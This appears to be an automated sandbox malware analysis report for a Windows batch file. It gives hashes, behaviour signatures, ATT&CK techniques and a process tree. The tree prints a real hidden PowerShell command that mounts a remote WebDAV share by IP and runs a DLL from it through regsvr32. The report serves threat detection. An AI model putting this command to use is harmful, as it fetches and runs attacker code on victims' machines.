e111aa2f607d6c4bbda7dbec25f843937c03b16a544a0547864558c45abec80e

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
19/07/2024, 03:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

32712331968067909.bat
Size

19KB
MD5

9bbca1b9751e9bf84c57a669b8247320
SHA1

6f1517d6d6cbda0d55f4f1c661251ac63631f724
SHA256

1ab104c229d296d99ab689f8c0eda8237e78e96bb37a5f86d6f8ef48520850cf
SHA512

46c2556a3d4beb46e4d73210f4ccd95fb777a0f140dc880885e8d8b17d65539c68a730247c2d27a12d045d302be01a0ac51c85fd13e9f6f0a008821ed5936674
SSDEEP

384:TtRV1YoY8Ppta+zo6v5ys3nQ+9WAjH1dyK1RjNs+cGzkIkhhuky2b7vBT:TbV1/9phzfxpnQ+MAjVQKb5pcGzXkbHJ

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2836	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2836	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1740	wordpad.exe
1740	wordpad.exe
1740	wordpad.exe
1740	wordpad.exe
1740	wordpad.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1452 wrote to memory of 1740	1452	cmd.exe	31
PID 1452 wrote to memory of 1740	1452	cmd.exe	31
PID 1452 wrote to memory of 1740	1452	cmd.exe	31
PID 1452 wrote to memory of 2836	1452	cmd.exe	32
PID 1452 wrote to memory of 2836	1452	cmd.exe	32
PID 1452 wrote to memory of 2836	1452	cmd.exe	32
PID 2836 wrote to memory of 2896	2836	powershell.exe	34
PID 2836 wrote to memory of 2896	2836	powershell.exe	34
PID 2836 wrote to memory of 2896	2836	powershell.exe	34
PID 2836 wrote to memory of 3016	2836	powershell.exe	35
PID 2836 wrote to memory of 3016	2836	powershell.exe	35
PID 2836 wrote to memory of 3016	2836	powershell.exe	35
PID 2836 wrote to memory of 3016	2836	powershell.exe	35
PID 2836 wrote to memory of 3016	2836	powershell.exe	35

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\32712331968067909.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1452
- C:\Program Files\Windows NT\Accessories\wordpad.exe
  "C:\Program Files\Windows NT\Accessories\wordpad.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\219941695311607.dll
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:2896
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\219941695311607.dll
    3⤵
    PID:3016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2836-23-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2836-24-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download